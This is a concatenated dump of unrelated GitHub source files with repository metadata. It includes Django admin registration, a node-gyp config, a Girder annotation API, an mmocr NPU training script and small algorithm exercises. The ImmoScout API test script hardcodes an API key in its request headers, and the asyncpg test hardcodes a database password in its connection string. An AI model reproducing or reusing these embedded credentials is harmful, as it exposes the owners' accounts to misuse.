ead80ff7e262f85fb9e82c38864ce01ba505bf46 | f1d2332045791d155ac712169c51e3d0157a9040 | /dana/app_dana/admin.py | 0caa616abff9e8a625d6c0502f697a2c0aad8186 | [] | no_license | bulikkk/DanaPage | 97631d65fa83256b0853c483cf1bd08b4bfb4d0a | 316c048b51b769c65bea1ddf3bdcf61764d71cae | refs/heads/master | 2021-01-20T14:28:32.245003 | 2017-07-18T20:31:18 | 2017-07-18T20:31:18 | 90,613,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | from django.contrib import admin
from .models import Banner, Project
# Register your models here.
@admin.register(Project)
class ProjectAdmin(admin.ModelAdmin):
fields = ('title', 'description', 'type', 'image', 'new')
@admin.register(Banner)
class BannerAdmin(admin.ModelAdmin):
fields = ('title', 'time', 'no', 'image', 'active')
| [
"bulik.piotr@gmail.com"
] | bulik.piotr@gmail.com |
c9b5dc584f87539fc823344d500800f12cf0d1b8 | 21fe7a80b6dd30281bf045620723d6648150224f | /node_modules/mongoskin/node_modules/mongodb/node_modules/bson/build/config.gypi | b50bf85cfcefc7b35cb007ba470cbc796e955055 | [
"MIT",
"Apache-2.0"
] | permissive | artalgame/chat-node-js | cdc6fe98e9dddef79b588a35b692d278e790e5b1 | 3ad689f81149b2d817abc229fc600eb187bb6a43 | refs/heads/master | 2021-01-20T11:25:59.101449 | 2013-12-15T00:29:53 | 2013-12-15T00:29:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,455 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.node-gyp/0.10.18",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"viewer": "man",
"browser": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data/etc/npmignore",
"shell": "/usr/bin/oo-trap-user",
"init_author_url": "",
"shrinkwrap": "true",
"parseable": "",
"userignorefile": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npmignore",
"sign_git_tag": "",
"init_author_email": "",
"cache_max": "null",
"long": "",
"ignore": "",
"npat": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"versions": "",
"message": "%s",
"globalconfig": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"proprietary_attribs": "true",
"fetch_retry_mintimeout": "10000",
"json": "",
"coverage": "",
"pre": "",
"https_proxy": "",
"engine_strict": "",
"description": "true",
"userconfig": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npmrc",
"init_module": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npm-init.js",
"npaturl": "http://npat.npmjs.org/",
"user": "5149",
"node_version": "v0.10.18",
"save": "",
"editor": "vi",
"tag": "latest",
"global": "",
"username": "",
"optional": "true",
"force": "",
"bin_links": "true",
"searchopts": "",
"depth": "null",
"searchsort": "name",
"rebuild_bundle": "true",
"yes": "",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"group": "5149",
"fetch_retry_factor": "10",
"dev": "",
"version": "",
"cache_lock_stale": "60000",
"cache_min": "10",
"searchexclude": "",
"cache": "/var/lib/openshift/525ef577e0b8cd0ea20000db/app-root/data/.npm",
"color": "true",
"save_optional": "",
"user_agent": "node/v0.10.18 linux x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "18",
"init_version": "0.0.0",
"init_author_name": "",
"git": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data/bin/git",
"unsafe_perm": "true",
"tmp": "/tmp/",
"onload_script": "",
"link": "",
"prefix": "/var/lib/stickshift/525ef577e0b8cd0ea20000db/app-root/data"
}
}
| [
"artalgs@gmail.com"
] | artalgs@gmail.com |
67142483d36d0db80900abc7955171ba9822c98b | 68cd659b44f57adf266dd37789bd1da31f61670d | /swea/덧셈.py | e5b8ab0ac443bc65fe5936e0ac9141aab0492675 | [] | no_license | 01090841589/solved_problem | c0c6f5a46e4d48860dccb3b0288aa5b56868fbca | bbea2f31e5fe36cad100bc514eacd83545fb25b1 | refs/heads/master | 2023-07-02T23:55:51.631478 | 2021-08-04T13:57:00 | 2021-08-04T13:57:00 | 197,157,830 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py |
def summ(k, scr):
if scr == num:
result = []
for j in range(N):
if visited[j]:
result.append(j+1)
print(result)
return
if scr > num:
return
if k >= N:
return
visited[k] = arr[k]
summ(k+1, scr+arr[k])
visited[k] = 0
summ(k+1, scr)
arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
N = len(arr)
num = 10
visited = [0] * N
summ(0, 0) | [
"chanchanhwan@naver.com"
] | chanchanhwan@naver.com |
53f341d9c5602b342cdf23b6be69e940832f7e46 | dc150d7be2cc82a28aea96b963ea15c6dc146df1 | /app/readtest.py | fb90774bfeeec30bcbd2735885b7863d0c38005f | [] | no_license | pboavida/aztraproject | 2605884d53918d3066f58dfbafe7174a5c035bb2 | c4d59bba9d2e5d5d0b4f2ed676590022014aaea8 | refs/heads/master | 2021-01-08T20:57:38.536908 | 2020-02-21T13:04:31 | 2020-02-21T13:04:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,551 | py | import requests
import json
from os import getenv
# this file was created to test if all the data needed for the tables is obtainable from the api requests
#the data as obtained in the print statements below is not necessarily ready to be entered directly in the tables.
# some data needs to be parsed, such as the deposit (which is obtained as a string from the api but should be entered as a number on the tables
# or the phone numbers (or any other variables with multiple references) which should be cross-checked for consistency
base_url = 'https://immoscout-api-ji3l2ohvha-lz.a.run.app'
summary_url = '/get_summary'
page_url = '/get_list?page='
data_url = '/get_data?id='
get_summary = requests.get(base_url + summary_url,headers={"accept":"application/json","X-API-KEY":"dffbab93-44e9-41c2-bfff-6bab66c89b6c"})
if get_summary:
print('Success!')
else:
print('An error has occurred getting the data summary.')
total_pages = get_summary.json()["total_pages"]
total_adds = get_summary.json()["total_ads"]
i = 2
page_info = []
id_list = []
ad_list = []
temp_list = requests.get(base_url + page_url + str(i),headers={"accept": "application/json", "X-API-KEY": "dffbab93-44e9-41c2-bfff-6bab66c89b6c"})
if temp_list:
print(temp_list.json())
page_info.append(temp_list.json())
x = page_info[0]['ids'][2]
temp_data= requests.get(base_url + data_url + str(x),headers={"accept": "application/json", "X-API-KEY": "dffbab93-44e9-41c2-bfff-6bab66c89b6c"})
print('immoscout_id:=',temp_data.json()['expose.expose']['realEstate']['@id'])
if 'livingSpace' in temp_data.json()['expose.expose']['realEstate']:
print('area_sq_m:=', temp_data.json()['expose.expose']['realEstate']['livingSpace'])
print('cnt_rooms:=',temp_data.json()['expose.expose']['realEstate']['numberOfRooms'])
if 'numberOfFloors' in temp_data.json()['expose.expose']['realEstate']:
print('cnt_floors:=', temp_data.json()['expose.expose']['realEstate']['numberOfFloors'])
if 'floor' in temp_data.json()['expose.expose']['realEstate']:
print('floor:=', temp_data.json()['expose.expose']['realEstate']['floor'])
print('type=',temp_data.json()['expose.expose']['realEstate']['apartmentType'])
print('has_fitted_kitchen:=',temp_data.json()['expose.expose']['realEstate']['builtInKitchen'])
print('has_lift:=',temp_data.json()['expose.expose']['realEstate']['lift'])
print('has_balcony:=',temp_data.json()['expose.expose']['realEstate']['balcony'])
print('has_garden:=',temp_data.json()['expose.expose']['realEstate']['garden'])
print('has_guest_toilet:=',temp_data.json()['expose.expose']['realEstate']['guestToilet'])
print('is_barrier_free:=',temp_data.json()['expose.expose']['realEstate']['handicappedAccessible'])
if 'heatingType' in temp_data.json()['expose.expose']['realEstate']:
print('heating_type:=', temp_data.json()['expose.expose']['realEstate']['heatingType'])
if 'thermalCharacteristic' in temp_data.json()['expose.expose']['realEstate']:
print('thermal_characteristic:=', temp_data.json()['expose.expose']['realEstate']['thermalCharacteristic'])
if 'totalRent' in temp_data.json()['expose.expose']['realEstate']:
print('total_rent:=', temp_data.json()['expose.expose']['realEstate']['totalRent'])
print('calculatedTotalRent=', temp_data.json()['expose.expose']['realEstate']['calculatedTotalRent'])
print('base_rent:=', temp_data.json()['expose.expose']['realEstate']['baseRent'])
print('service_charge:=', temp_data.json()['expose.expose']['realEstate']['serviceCharge'])
if 'deposit' in temp_data.json()['expose.expose']['realEstate']:
print('deposit:=', temp_data.json()['expose.expose']['realEstate']['deposit'])
print('city:=', temp_data.json()['expose.expose']['realEstate']['address']['city'])
print('district:=', temp_data.json()['expose.expose']['realEstate']['address']['quarter'])
print('zip_code:=', temp_data.json()['expose.expose']['realEstate']['address']['postcode'])
if 'street' in temp_data.json()['expose.expose']['realEstate']['address']:
print('street:=', temp_data.json()['expose.expose']['realEstate']['address']['street'])
if 'houseNumber' in temp_data.json()['expose.expose']['realEstate']['address']:
print('house_number:=', temp_data.json()['expose.expose']['realEstate']['address']['houseNumber'])
if 'wgs84Coordinate' in temp_data.json()['expose.expose']['realEstate']['address']:
if 'longitude' in temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']:
print('lng:=',
temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']['longitude'])
if 'latitude' in temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']:
print('lat:=',
temp_data.json()['expose.expose']['realEstate']['address']['wgs84Coordinate']['latitude'])
if 'company' in temp_data.json()['expose.expose']['contactDetails']:
print('company_name:=', temp_data.json()['expose.expose']['contactDetails']['company'])
if 'contact_firstname' in temp_data.json()['expose.expose']['contactDetails']:
print('contact_firstname:=', temp_data.json()['expose.expose']['contactDetails']['firstname'])
if 'lastname' in temp_data.json()['expose.expose']['contactDetails']:
print('contact_lastname:=', temp_data.json()['expose.expose']['contactDetails']['lastname'])
if 'salutation' in temp_data.json()['expose.expose']['contactDetails']:
print('salutation:=', temp_data.json()['expose.expose']['contactDetails']['salutation'])
if 'email' in temp_data.json()['expose.expose']['contactDetails']['email']:
print('email:=',temp_data.json()['expose.expose']['contactDetails']['email'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumberCountryCode'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumberAreaCode'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumberSubscriber'])
print('phone_number:=',temp_data.json()['expose.expose']['contactDetails']['phoneNumber'])
print('mobile_number:=',temp_data.json()['expose.expose']['contactDetails']['cellPhoneNumber'])
print('address_city:=',temp_data.json()['expose.expose']['contactDetails']['address']['city'])
print('address_street:=',temp_data.json()['expose.expose']['contactDetails']['address']['street'])
print('address_zip_code:=',temp_data.json()['expose.expose']['contactDetails']['address']['postcode'])
print('address_house_number:=',temp_data.json()['expose.expose']['contactDetails']['address']['houseNumber'])
| [
"pedrom2boavida@gmail.com"
] | pedrom2boavida@gmail.com |
c0a4781c6bcf405595b392c0498e6a3e26ee1b42 | fc3564bc78effa5daf09c582b21c8cbc79a68e4b | /leetcode/rotateRight.py | f59e78fc9598b054fcc113ba4d643cd71d4234cb | [] | no_license | TimiLikesJava/interview-prep | f567d79ff066aab31468405e5ee107641756ebad | a7071ebe89e173a95b3708265e3c95fb43f1fb19 | refs/heads/master | 2022-11-26T03:55:07.775927 | 2020-07-28T12:30:16 | 2020-07-28T12:30:16 | 271,274,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | def rotateRight(self, head: ListNode, k: int) -> ListNode:
if(head is None):
return
if(k == 0):
return head
count = 0
curr = head
while curr is not None:
count += 1
curr = curr.next
if(count == 1):
return head
if(count == k):
return head
num = count - (k % count)
num = num - 1
point = head
for i in range(num):
point = point.next
temp = point.next
if(temp is None):
return head
point.next = None
if(temp.next is None):
temp.next = head
head = temp
return head
else:
ans = temp
while ans.next is not None:
ans = ans.next
ans.next = head
head = temp
return head
| [
"noreply@github.com"
] | noreply@github.com |
c37e90516146a963e73064dbae83398fa95b20e3 | 1d48ddd72477de7d9ad98eef61bdfb406859b31c | /04. asyncio/web_scraping/test_pg.py | 31752e74e37bf55d125a66ca1feeb9777c26d7ae | [] | no_license | alexshchegretsov/async_techniques | b68d27de58bc2393520eb080838b2c72d356d2f3 | 42118504a39ccbd0bebad4ed41eba4b5c2e3d5dd | refs/heads/master | 2020-12-04T06:40:34.712114 | 2020-01-06T20:59:58 | 2020-01-06T20:59:58 | 231,661,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 450 | py | # -*- coding: utf-8 -*-
import asyncio
import asyncpg
async def run():
# conn = await asyncpg.connect(user="async", password="Dexter89!", database="async_db", host="127.0.0.1", port="5432")
conn = await asyncpg.connect("postgresql://async:Dexter89!@localhost/async_db")
values = await conn.fetch("""select * from talks_headers""")
await conn.close()
print(values, len(values))
if __name__ == '__main__':
asyncio.run(run())
| [
"nydollz77@gmail.com"
] | nydollz77@gmail.com |
759c45def54042c121a663b109de8f3c61c67d6e | 8af2c447bdde781f8016608b7dab0b2a2d975354 | /server/dive_server/views_annotation.py | 1e8a9d0494ca33ec42e7661d78fa882f9f6b1029 | [
"Apache-2.0"
] | permissive | acproject/dive | b8f580bb62bc0eda9d3fb3a6e33c0fd9edb74cf0 | 224f8c8814d306fcaf1191b2bc08851904e64577 | refs/heads/main | 2023-08-11T01:57:00.605940 | 2021-10-05T16:25:03 | 2021-10-05T16:25:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,554 | py | from typing import List, Optional
from girder.api import access
from girder.api.describe import Description, autoDescribeRoute
from girder.api.rest import Resource, setContentDisposition
from girder.constants import AccessType, TokenScope
from girder.models.folder import Folder
from . import crud, crud_annotation
DatasetModelParam = {
'description': "dataset id",
'model': Folder,
'paramType': 'query',
'required': True,
}
class AnnotationResource(Resource):
"""RESTFul Annotation Resource"""
def __init__(self, resourceName):
super(AnnotationResource, self).__init__()
self.resourceName = resourceName
self.route("GET", (), self.get_annotations)
self.route("GET", ("export",), self.export)
self.route("PATCH", (), self.save_annotations)
@access.user
@autoDescribeRoute(
Description("Get annotations of a clip").modelParam(
"folderId", **DatasetModelParam, level=AccessType.READ
)
)
def get_annotations(self, folder):
return crud_annotation.get_annotations(folder)
@access.public(scope=TokenScope.DATA_READ, cookie=True)
@autoDescribeRoute(
Description("Export annotations of a clip into CSV format.")
.modelParam("folderId", **DatasetModelParam, level=AccessType.READ)
.param(
"excludeBelowThreshold",
"Exclude tracks with confidencePairs below set threshold",
paramType="query",
dataType="boolean",
default=False,
)
.jsonParam(
"typeFilter",
"List of track types to filter by",
paramType="query",
required=False,
default=None,
requireArray=True,
)
)
def export(self, folder, excludeBelowThreshold: bool, typeFilter: Optional[List[str]]):
crud.verify_dataset(folder)
filename, gen = crud.get_annotation_csv_generator(
folder,
self.getCurrentUser(),
excludeBelowThreshold=excludeBelowThreshold,
typeFilter=typeFilter,
)
setContentDisposition(filename)
return gen
@access.user
@autoDescribeRoute(
Description("")
.modelParam("folderId", **DatasetModelParam, level=AccessType.WRITE)
.jsonParam("tracks", "upsert and delete tracks", paramType="body", requireObject=True)
)
def save_annotations(self, folder, tracks):
return crud_annotation.save_annotations(folder, self.getCurrentUser(), tracks)
| [
"noreply@github.com"
] | noreply@github.com |
472e2678e5a33ac3ef0f0b99023128e995f69fe6 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/cv/detection/DBpp_ID4145_for_PyTorch/mmocr/apis/train.py | dd009ec1a6e189694585385e994c91ebbb28894e | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 11,120 | py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2017
# All rights reserved.
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ==========================================================================
# Copyright (c) OpenMMLab. All rights reserved.
import warnings
import mmcv
import numpy as np
import torch
import torch.distributed as dist
from torch_npu.contrib.module.deform_conv import ModulatedDeformConv
try:
import apex
from apex import amp
except ImportError:
print("Better speed can be achieved with apex installed from https://www.github.com/nvidia/apex.")
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.device.npu import NPUDataParallel, NPUDistributedDataParallel
from mmcv.runner import (DistSamplerSeedHook, EpochBasedRunner,
Fp16OptimizerHook, OptimizerHook, build_optimizer,
build_runner, get_dist_info)
from mmcv.ops.modulated_deform_conv import ModulatedDeformConv2dPack
from mmdet.core import DistEvalHook, EvalHook
from mmdet.datasets import build_dataloader, build_dataset
from mmocr import digit_version
from mmocr.apis.utils import (disable_text_recog_aug_test,
replace_image_to_tensor)
from mmocr.utils import get_root_logger
class ApexOptimizerHook(OptimizerHook):
def after_train_iter(self, runner):
runner.optimizer.zero_grad()
if self.detect_anomalous_params:
self.detect_anomalous_parameters(runner.outputs['loss'], runner)
with amp.scale_loss(runner.outputs['loss'], runner.optimizer) as scaled_loss:
scaled_loss.backward()
if self.grad_clip is not None:
grad_norm = self.clip_grads(runner.model.parameters())
if grad_norm is not None:
# Add grad norm to the logger
runner.log_buffer.update({'grad_norm': float(grad_norm)},
runner.outputs['num_samples'])
runner.optimizer.step()
def replace_layers(model):
for n, m in model.named_children():
if len(list(m.children())) > 0:
## compound module, go inside it
replace_layers(m)
if isinstance(m, ModulatedDeformConv2dPack):
## simple module
new = ModulatedDeformConv(m.in_channels, m.out_channels, m.kernel_size,
m.stride[0] if isinstance(m.stride, tuple) else m.stride,
m.padding[0] if isinstance(m.padding, tuple) else m.padding,
m.dilation[0] if isinstance(m.dilation, tuple) else m.dilation,
m.groups, m.deform_groups, m.bias)
try:
n = int(n)
model[n] = new
except:
setattr(model, n, new)
def train_detector(model,
dataset,
cfg,
distributed=False,
validate=False,
timestamp=None,
meta=None):
logger = get_root_logger(cfg.log_level)
# prepare data loaders
dataset = dataset if isinstance(dataset, (list, tuple)) else [dataset]
# step 1: give default values and override (if exist) from cfg.data
default_loader_cfg = {
**dict(
num_gpus=len(cfg.gpu_ids),
dist=distributed,
seed=cfg.get('seed'),
drop_last=False,
pin_memory=True,
persistent_workers=False),
**({} if torch.__version__ != 'parrots' else dict(
prefetch_num=2,
)),
}
# update overall dataloader(for train, val and test) setting
default_loader_cfg.update({
k: v
for k, v in cfg.data.items() if k not in [
'train', 'val', 'test', 'train_dataloader', 'val_dataloader',
'test_dataloader'
]
})
# step 2: cfg.data.train_dataloader has highest priority
train_loader_cfg = dict(default_loader_cfg,
**cfg.data.get('train_dataloader', {}))
data_loaders = [build_dataloader(ds, **train_loader_cfg) for ds in dataset]
replace_layers(model)
# put model on gpus
if distributed:
find_unused_parameters = cfg.get('find_unused_parameters', False)
# Sets the `find_unused_parameters` parameter in
# torch.nn.parallel.DistributedDataParallel
if torch.npu.is_available():
model = NPUDistributedDataParallel(
model.npu(),
device_ids=[torch.npu.current_device()],
broadcast_buffers=False,
find_unused_parameters=find_unused_parameters)
else:
model = MMDistributedDataParallel(
model.cuda(),
device_ids=[torch.cuda.current_device()],
broadcast_buffers=False,
find_unused_parameters=find_unused_parameters)
else:
if not torch.cuda.is_available():
assert digit_version(mmcv.__version__) >= digit_version('1.4.4'), \
'Please use MMCV >= 1.4.4 for CPU training!'
if torch.npu.is_available():
model = NPUDataParallel(model.npu(), device_ids=cfg.gpu_ids)
else:
model = MMDataParallel(model, device_ids=cfg.gpu_ids)
# build runner
if torch.npu.is_available():
optimizer = apex.optimizers.NpuFusedSGD(model.module.parameters(),
lr=cfg.optimizer['lr'],
momentum=cfg.optimizer['momentum'],
weight_decay=cfg.optimizer['weight_decay'])
model.module, optimizer = amp.initialize(model.module, optimizer,
opt_level='O1', loss_scale=32768,
combine_grad=True)
else:
optimizer = build_optimizer(model, cfg.optimizer)
if 'runner' not in cfg:
cfg.runner = {
'type': 'EpochBasedRunner',
'max_epochs': cfg.total_epochs
}
warnings.warn(
'config is now expected to have a `runner` section, '
'please set `runner` in your config.', UserWarning)
else:
if 'total_epochs' in cfg:
assert cfg.total_epochs == cfg.runner.max_epochs
runner = build_runner(
cfg.runner,
default_args=dict(
model=model,
optimizer=optimizer,
work_dir=cfg.work_dir,
logger=logger,
meta=meta))
# an ugly workaround to make .log and .log.json filenames the same
runner.timestamp = timestamp
# fp16 setting
fp16_cfg = cfg.get('fp16', None)
if fp16_cfg is not None:
optimizer_config = Fp16OptimizerHook(
**cfg.optimizer_config, **fp16_cfg, distributed=distributed)
else:
optimizer_config = ApexOptimizerHook(**cfg.optimizer_config)
# register hooks
runner.register_training_hooks(
cfg.lr_config,
optimizer_config,
cfg.checkpoint_config,
cfg.log_config,
cfg.get('momentum_config', None),
custom_hooks_config=cfg.get('custom_hooks', None))
if distributed:
if isinstance(runner, EpochBasedRunner):
runner.register_hook(DistSamplerSeedHook())
# register eval hooks
if validate:
val_samples_per_gpu = (cfg.data.get('val_dataloader', {})).get(
'samples_per_gpu', cfg.data.get('samples_per_gpu', 1))
if val_samples_per_gpu > 1:
# Support batch_size > 1 in test for text recognition
# by disable MultiRotateAugOCR since it is useless for most case
cfg = disable_text_recog_aug_test(cfg)
cfg = replace_image_to_tensor(cfg)
val_dataset = build_dataset(cfg.data.val, dict(test_mode=True))
val_loader_cfg = {
**default_loader_cfg,
**dict(shuffle=False, drop_last=False),
**cfg.data.get('val_dataloader', {}),
**dict(samples_per_gpu=val_samples_per_gpu)
}
val_dataloader = build_dataloader(val_dataset, **val_loader_cfg)
eval_cfg = cfg.get('evaluation', {})
eval_cfg['by_epoch'] = cfg.runner['type'] != 'IterBasedRunner'
eval_hook = DistEvalHook if distributed else EvalHook
runner.register_hook(eval_hook(val_dataloader, **eval_cfg))
if cfg.resume_from:
runner.resume(cfg.resume_from)
elif cfg.load_from:
runner.load_checkpoint(cfg.load_from)
runner.run(data_loaders, cfg.workflow)
def init_random_seed(seed=None, device='cuda'):
"""Initialize random seed. If the seed is None, it will be replaced by a
random number, and then broadcasted to all processes.
Args:
seed (int, Optional): The seed.
device (str): The device where the seed will be put on.
Returns:
int: Seed to be used.
"""
if seed is not None:
return seed
# Make sure all ranks share the same random seed to prevent
# some potential bugs. Please refer to
# https://github.com/open-mmlab/mmdetection/issues/6339
rank, world_size = get_dist_info()
seed = np.random.randint(2**31)
if world_size == 1:
return seed
if rank == 0:
random_num = torch.tensor(seed, dtype=torch.int32, device=device)
else:
random_num = torch.tensor(0, dtype=torch.int32, device=device)
dist.broadcast(random_num, src=0)
return random_num.item()
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
63406186486569e40cecf5de8a6cae1dc00ae400 | f54070cd3048a3645cb25f301592a904d387a1c9 | /python_prgrams/testpython/class.py | d90814e0b94bcc93934d6f3342591b4b93ec4eaa | [] | no_license | mak705/Python_interview | 02bded60417f1e6e2d81e1f6cde6961d95da2a8e | aff2d6018fd539dbcde9e3a6b3f8a69167ffca0d | refs/heads/master | 2020-03-22T21:03:34.018919 | 2019-11-15T08:51:34 | 2019-11-15T08:51:34 | 140,653,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | class PartyAnimal:
x = 0
def party(self):
self.x = self.x + 1
print "so far ", self.x
an = PartyAnimal()
an.party()
an.party()
an.party()
print "Type", type(an)
print "Dir", dir(an)
#PartyAnimal.party(an)
| [
"mak705@gmail.com"
] | mak705@gmail.com |
c749c633bdfd24a7f053d5758c163cb270b8c78a | e4c7bb2f81c305939c94ded69d3a425a53ed5985 | /mundo-2/ex-055.py | eeda2a43d83b6a5b18bbf66b50c1b4abdb22f50d | [
"MIT"
] | permissive | guilhermesm28/python-curso-em-video | 22eecd84fef24bcadbcb04bbfc9a2386dfe526a9 | 50ab4e76b1903e62d4daa579699c5908329b26c8 | refs/heads/master | 2022-10-13T05:45:31.961161 | 2020-06-11T22:59:24 | 2020-06-11T22:59:24 | 267,751,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | # Faça um programa que leia o peso de cinco pessoas. No final, mostre qual foi o maior e o menor peso lidos.
print('-' * 100)
print('{: ^100}'.format('EXERCÍCIO 055 - MAIOR E MENOR DA SEQUÊNCIA'))
print('-' * 100)
maior = 0
menor = 0
for i in range(1,6):
peso = float(input(f'Peso da {i}ª pessoa: '))
if i == 1:
maior = peso
menor = peso
else:
if peso > maior:
maior = peso
elif peso < menor:
menor = peso
print(f'\nMaior peso: {maior:.2f}kg \nMenor peso: {menor:.2f}kg')
print('-' * 100)
input('Pressione ENTER para sair...')
| [
"devguilhermemoreira@gmail.com"
] | devguilhermemoreira@gmail.com |
c9a3a0c61090dc5a0df06daf9966f3d68d3b0fd0 | b53071f631a030df707197f7403d55d7bbd5b1d1 | /src/utils/label_smoothing_loss.py | 1bd3e03468758014997df6cb3c680003e713b5eb | [] | no_license | JJoving/SMLAT | 4d2baba38a9b0cdc4d5cf307ed1729255500142a | 4bec314ea4ad7b67db1e4b78e3ec1a2fa8d866ba | refs/heads/master | 2020-06-29T07:56:14.371708 | 2019-10-28T12:38:21 | 2019-10-28T12:38:21 | 200,479,610 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,048 | py | import torch
from torch import nn
class LabelSmoothingLoss(nn.Module):
"""Label-smoothing loss
:param int size: the number of class
:param int padding_idx: ignored class id
:param float smoothing: smoothing rate (0.0 means the conventional CE)
:param bool normalize_length: normalize loss by sequence length if True
:param torch.nn.Module criterion: loss function to be smoothed
"""
def __init__(self, size, padding_idx, smoothing, normalize_length=False, criterion=nn.NLLLoss(reduce=False)):
super(LabelSmoothingLoss, self).__init__()
self.criterion = criterion
self.padding_idx = padding_idx
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
self.size = size
self.true_dist = None
self.normalize_length = normalize_length
def forward(self, x, target):
"""Compute loss between x and target
:param torch.Tensor x: prediction (batch, seqlen, class)
:param torch.Tensor target: target signal masked with self.padding_id (batch, seqlen)
:return: scalar float value
:rtype torch.Tensor
"""
#import pdb
#pdb.set_trace()
#assert x.size(2) == self.size
batch_size = x.size(0)
x = x.view(-1, self.size)
target = target.view(-1)
#with torch.no_grad():
true_dist = x.clone()
true_dist.fill_(self.smoothing / (self.size - 1))
ignores = target == self.padding_idx # (B,)
total = len(target) - ignores.sum().item()
target = target.masked_fill(ignores, 0) # avoid -1 index
true_dist.scatter_(1, target.unsqueeze(1), self.confidence)
#kl = self.criterion(torch.log_softmax(x, dim=1), true_dist)
#celoss = -torch.sum(torch.log_softmax(x, dim=1) * true_dist)
celoss = torch.log_softmax(x, dim=1) * true_dist
#denom = total if self.normalize_length else batch_size
#denom = true_dist.size(0)
return -celoss.masked_fill(ignores.unsqueeze(1), 0).sum() | [
"732585148@qq.com"
] | 732585148@qq.com |
fde84b7f86fe2e5414ad0afb303c5772a3a2bfbf | 0769e74f495d697266407e84054a52ea5da7ad49 | /old/src/YoutubeParseHandler.py | bc82f59feb37b5fa99724bf234172d9268943c5c | [
"MIT"
